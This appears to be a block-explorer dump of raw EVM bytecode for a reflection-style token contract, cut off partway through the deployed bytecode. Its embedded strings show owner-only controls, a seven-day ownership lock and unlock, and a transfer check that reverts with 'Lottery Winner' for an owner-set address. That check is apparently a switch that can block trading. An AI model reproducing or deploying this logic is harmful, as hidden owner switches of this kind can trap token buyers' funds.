08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b8060128190555050565b6060600e8054600181600116156101000203166002900480601f0160208091040260200160405190810160405280929190818152602001828054600181600116156101000203166002900480156126475780601f1061261c57610100808354040283529160200191612647565b820191906000526020600020905b81548152906001019060200180831161262a57829003601f168201915b5050505050905090565b600061271461265e613363565b8461270f856040518060600160405280602581526020016156186025913960066000612688613363565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546139259092919063ffffffff16565b61336b565b6001905092915050565b3373ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146127c4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260238152602001806155f56023913960400191505060405180910390fd5b600254421161283b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601f8152602001807f436f6e7472616374206973206c6f636b656420756e74696c203720646179730081525060200191505060405180910390fd5b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b612943613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612a03576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b80601460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600060011515600360009054906101000a900460ff1615151415612b4457601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415612b29576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252600e8152602001807f4c6f74746572792057696e6e657200000000000000000000000000000000000081525060200191505060405180910390fd5b612b3b612b34613363565b8484613562565b60019050612b5b565b612b56612b4f613363565b8484613562565b600190505b92915050565b6000600254905090565b601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b612b99613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612c59576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b80601460156101000a81548160ff0219169083151502179055507f53726dfcaf90650aa7eb35524f4d3220f07413c8d6cb404cc8c18bf5591bc1598160405180821515815260200191505060405180910390a150565b600360009054906101000a900460ff1681565b612cca613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612d8a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b612db4620f4240612da683600a54613b8890919063ffffffff16565b613a1090919063ffffffff16565b60158190555050565b612dc5613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612e85576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550804201600281905550600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a350565b6000600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b61303d613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146130fd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b613160613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614613220576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156132a6576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602681526020018061549e6026913960400191505060405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156133f1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260248152602001806155a56024913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415613477576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260228152602001806154c46022913960400191505060405180910390fd5b80600660008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040518082815260200191505060405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156135e8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260258152602001806155806025913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561366e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260238152602001806154516023913960400191505060405180910390fd5b600081116136c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260298152602001806155576029913960400191505060405180910390fd5b6136cf6124b4565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415801561373d575061370d6124b4565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b1561379e5760155481111561379d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260288152602001806154e66028913960400191505060405180910390fd5b5b60006137a9306120bd565b905060155481106137ba5760155490505b600060165482101590508080156137dc575060148054906101000a900460ff16155b801561383457507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b801561384c5750601460159054906101000a900460ff165b1561386057601654915061385f82613c0e565b5b600060019050600760008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806139075750600760008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561391157600090505b61391d86868684613cee565b505050505050565b60008383111582906139d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b8381101561399757808201518184015260208101905061397c565b50505050905090810190601f1680156139c45780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b5060008385039050809150509392505050565b60008060006139f2613fff565b91509150613a098183613a1090919063ffffffff16565b9250505090565b6000613a5283836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250614290565b905092915050565b600080828401905083811015613ad8576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f536166654d6174683a206164646974696f6e206f766572666c6f77000000000081525060200191505060405180910390fd5b8091505092915050565b6000806000806000806000806000613af98a614356565b9250925092506000806000613b178d8686613b126139e5565b6143b0565b9250925092508282828888889b509b509b509b509b509b5050505050505091939550919395565b6000613b8083836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250613925565b905092915050565b600080831415613b9b5760009050613c08565b6000828402905082848281613bac57fe5b0414613c03576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602181526020018061550e6021913960400191505060405180910390fd5b809150505b92915050565b60016014806101000a81548160ff0219169083151502179055506000613c3e600283613a1090919063ffffffff16565b90506000613c558284613b3e90919063ffffffff16565b90506000479050613c6583614439565b6000613c7a8247613b3e90919063ffffffff16565b9050613c8683826146e7565b7f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb56184828560405180848152602001838152602001828152602001935050505060405180910390a15050505060016014806101000a81548160ff02191690831515021790555050565b80613cfc57613cfb614838565b5b600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015613d9f5750600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15613db457613daf84848461487b565b613feb565b600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015613e575750600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15613e6c57613e67848484614adb565b613fea565b600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015613f105750600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15613f2557613f20848484614d3b565b613fe9565b600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015613fc75750600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15613fdc57613fd7848484614f06565b613fe8565b613fe7848484614d3b565b5b5b5b5b80613ff957613ff86151fb565b5b50505050565b6000806000600b5490506000600a54905060005b6009805490508110156142535782600460006009848154811061403257fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054118061411957508160056000600984815481106140b157fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054115b1561413057600b54600a549450945050505061428c565b6141b9600460006009848154811061414457fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205484613b3e90919063ffffffff16565b925061424460056000600984815481106141cf57fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205483613b3e90919063ffffffff16565b91508080600101915050614013565b5061426b600a54600b54613a1090919063ffffffff16565b82101561428357600b54600a5493509350505061428c565b81819350935050505b9091565b6000808311829061433c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b838110156143015780820151818401526020810190506142e6565b50505050905090810190601f16801561432e5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b50600083858161434857fe5b049050809150509392505050565b6000806000806143658561520f565b9050600061437286615240565b9050600061439b8261438d858a613b3e90919063ffffffff16565b613b3e90919063ffffffff16565b90508083839550955095505050509193909250565b6000806000806143c98589613b8890919063ffffffff16565b905060006143e08689613b8890919063ffffffff16565b905060006143f78789613b8890919063ffffffff16565b90506000614420826144128587613b3e90919063ffffffff16565b613b3e90919063ffffffff16565b9050838184965096509650505050509450945094915050565b6060600267ffffffffffffffff8111801561445357600080fd5b506040519080825280602002602001820160405280156144825781602001602082028036833780820191505090505b509050308160008151811061449357fe5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b15801561453357600080fd5b505afa158015614547573d6000803e3d6000fd5b505050506040513d602081101561455d57600080fd5b81019080805190602001909291905050508160018151811061457b57fe5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506145e0307f00000000000000000000000000000000000000000000000000000000000000008461336b565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b815260040180868152602001858152602001806020018473ffffffffffffffffffffffffffffffffffffffff168152602001838152602001828103825285818151815260200191508051906020019060200280838360005b838110156146a2578082015181840152602081019050614687565b505050509050019650505050505050600060405180830381600087803b1580156146cb57600080fd5b505af11580156146df573d6000803e3d6000fd5b505050505050565b614712307f00000000000000000000000000000000000000000000000000000000000000008461336b565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d71982308560008061475c6124b4565b426040518863ffffffff1660e01b8152600401808773ffffffffffffffffffffffffffffffffffffffff1681526020018681526020018581526020018481526020018373ffffffffffffffffffffffffffffffffffffffff16815260200182815260200196505050505050506060604051808303818588803b1580156147e157600080fd5b505af11580156147f5573d6000803e3d6000fd5b50505050506040513d606081101561480c57600080fd5b810190808051906020019092919080519060200190929190805190602001909291905050505050505050565b600060105414801561484c57506000601254145b1561485657614879565b601054601181905550601254601381905550600060108190555060006012819055505b565b60008060008060008061488d87613ae2565b9550955095509550955095506148eb87600560008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061498086600460008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614a1585600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614a6181615271565b614a6b8483615416565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b600080600080600080614aed87613ae2565b955095509550955095509550614b4b86600460008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614be083600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600560008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614c7585600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614cc181615271565b614ccb8483615416565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b600080600080600080614d4d87613ae2565b955095509550955095509550614dab86600460008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614e4085600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614e8c81615271565b614e968483615416565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b600080600080600080614f1887613ae2565b955095509550955095509550614f7687600560008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061500b86600460008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506150a083600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600560008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061513585600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061518181615271565b61518b8483615416565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b601154601081905550601354601281905550565b6000615239606461522b60105485613b8890919063ffffffff16565b613a1090919063ffffffff16565b9050919050565b600061526a606461525c60125485613b8890919063ffffffff16565b613a1090919063ffffffff16565b9050919050565b600061527b6139e5565b905060006152928284613b8890919063ffffffff16565b90506152e681600460003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600860003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615615411576153cd83600560003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600560003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b61542b82600b54613b3e90919063ffffffff16565b600b8190555061544681600c54613a5a90919063ffffffff16565b600c81905550505056fe45524332303a207472616e7366657220746f20746865207a65726f2061646472657373416d6f756e74206d757374206265206c657373207468616e20746f74616c207265666c656374696f6e734f776e61626c653a206e6577206f776e657220697320746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f20616464726573735472616e7366657220616d6f756e74206578636565647320746865206d61785478416d6f756e742e536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f7745524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63655472616e7366657220616d6f756e74206d7573742062652067726561746572207468616e207a65726f45524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f20616464726573734578636c75646564206164647265737365732063616e6e6f742063616c6c20746869732066756e6374696f6e596f7520646f6e27742068617665207065726d697373696f6e20746f20756e6c6f636b45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220400488983f9ac9465543b9ceb41bd8f5af7a04e9e4b58d7ab1f104e66ddbf7b464736f6c634300060c0033
Deployed Bytecode
0x6080604052600436106102555760003560e01c806370a0823111610139578063a73b3c82116100b6578063ce9a3b0f1161007a578063ce9a3b0f14610ca2578063d543dbeb14610ccf578063dd46706414610d0a578063dd62ed3e14610d45578063ea2f0b3714610dca578063f2fde38b14610e1b5761025c565b8063a73b3c8214610b37578063a9059cbb14610b88578063b6c5232414610bf9578063ba13a57214610c24578063c49b9a8014610c655761025c565b80638da5cb5b116100fd5780638da5cb5b146109a35780638ee88c53146109e457806395d89b4114610a1f578063a457c2d714610aaf578063a69df4b514610b205761025c565b806370a082311461087e578063715018a6146108e35780637d1db4a5146108fa5780638757a90c1461092557806388f820201461093c5761025c565b80633685d419116101d25780634549b039116101965780634549b039146106d257806349bd5a5e1461072d5780634a74bb021461076e57806352390c021461079b5780635342acb4146107ec5780636bc87c3a146108535761025c565b80633685d4191461055957806339509351146105aa5780633b124fe71461061b5780633bd5d17314610646578063437823ec146106815761025c565b806318160ddd1161021957806318160ddd1461040957806323b872dd146104345780632d838119146104c5578063313ce567146105145780633158952e146105425761025c565b8063061c82d01461026157806306fdde031461029c578063095ea7b31461032c57806313114a9d1461039d5780631694505e146103c85761025c565b3661025c57005b600080fd5b34801561026d57600080fd5b5061029a6004803603602081101561028457600080fd5b8101908080359060200190929190505050610e6c565b005b3480156102a857600080fd5b506102b1610f3e565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156102f15780820151818401526020810190506102d6565b50505050905090810190601f16801561031e5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561033857600080fd5b506103856004803603604081101561034f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610fe0565b60405180821515815260200191505060405180910390f35b3480156103a957600080fd5b506103b2610ffe565b6040518082815260200191505060405180910390f35b3480156103d457600080fd5b506103dd611008565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34801561041557600080fd5b5061041e61102c565b6040518082815260200191505060405180910390f35b34801561044057600080fd5b506104ad6004803603606081101561045757600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050611036565b60405180821515815260200191505060405180910390f35b3480156104d157600080fd5b506104fe600480360360208110156104e857600080fd5b810190808035906020019092919050505061139c565b6040518082815260200191505060405180910390f35b34801561052057600080fd5b50610529611420565b604051808260ff16815260200191505060405180910390f35b34801561054e57600080fd5b50610557611437565b005b34801561056557600080fd5b506105a86004803603602081101561057c57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611562565b005b3480156105b657600080fd5b50610603600480360360408110156105cd57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506118ec565b60405180821515815260200191505060405180910390f35b34801561062757600080fd5b5061063061199f565b6040518082815260200191505060405180910390f35b34801561065257600080fd5b5061067f6004803603602081101561066957600080fd5b81019080803590602001909291905050506119a5565b005b34801561068d57600080fd5b506106d0600480360360208110156106a457600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611b36565b005b3480156106de57600080fd5b50610717600480360360408110156106f557600080fd5b8101908080359060200190929190803515159060200190929190505050611c59565b6040518082815260200191505060405180910390f35b34801561073957600080fd5b50610742611d10565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34801561077a57600080fd5b50610783611d34565b60405180821515815260200191505060405180910390f35b3480156107a757600080fd5b506107ea600480360360208110156107be57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611d47565b005b3480156107f857600080fd5b5061083b6004803603602081101561080f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612061565b60405180821515815260200191505060405180910390f35b34801561085f57600080fd5b506108686120b7565b6040518082815260200191505060405180910390f35b34801561088a57600080fd5b506108cd600480360360208110156108a157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506120bd565b6040518082815260200191505060405180910390f35b3480156108ef57600080fd5b506108f86121a8565b005b34801561090657600080fd5b5061090f61232e565b6040518082815260200191505060405180910390f35b34801561093157600080fd5b5061093a612334565b005b34801561094857600080fd5b5061098b6004803603602081101561095f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919050505061245e565b60405180821515815260200191505060405180910390f35b3480156109af57600080fd5b506109b86124b4565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b3480156109f057600080fd5b50610a1d60048036036020811015610a0757600080fd5b81019080803590602001909291905050506124dd565b005b348015610a2b57600080fd5b50610a346125af565b6040518080602001828103825283818151815260200191508051906020019080838360005b83811015610a74578082015181840152602081019050610a59565b50505050905090810190601f168015610aa15780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b348015610abb57600080fd5b50610b0860048036036040811015610ad257600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050612651565b60405180821515815260200191505060405180910390f35b348015610b2c57600080fd5b50610b3561271e565b005b348015610b4357600080fd5b50610b8660048036036020811015610b5a57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919050505061293b565b005b348015610b9457600080fd5b50610be160048036036040811015610bab57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050612a47565b60405180821515815260200191505060405180910390f35b348015610c0557600080fd5b50610c0e612b61565b6040518082815260200191505060405180910390f35b348015610c3057600080fd5b50610c39612b6b565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b348015610c7157600080fd5b50610ca060048036036020811015610c8857600080fd5b81019080803515159060200190929190505050612b91565b005b348015610cae57600080fd5b50610cb7612caf565b60405180821515815260200191505060405180910390f35b348015610cdb57600080fd5b50610d0860048036036020811015610cf257600080fd5b8101908080359060200190929190505050612cc2565b005b348015610d1657600080fd5b50610d4360048036036020811015610d2d57600080fd5b8101908080359060200190929190505050612dbd565b005b348015610d5157600080fd5b50610db460048036036040811015610d6857600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612fae565b6040518082815260200191505060405180910390f35b348015610dd657600080fd5b50610e1960048036036020811015610ded57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613035565b005b348015610e2757600080fd5b50610e6a60048036036020811015610e3e57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613158565b005b610e74613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f34576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b8060108190555050565b6060600d8054600181600116156101000203166002900480601f016020809104026020016040519081016040528092919081815260200182805460018160011615610100020316600290048015610fd65780601f10610fab57610100808354040283529160200191610fd6565b820191906000526020600020905b815481529060010190602001808311610fb957829003601f168201915b5050505050905090565b6000610ff4610fed613363565b848461336b565b6001905092915050565b6000600c54905090565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b6000600a54905090565b600060011515600360009054906101000a900460ff16151514156112c457600073fffff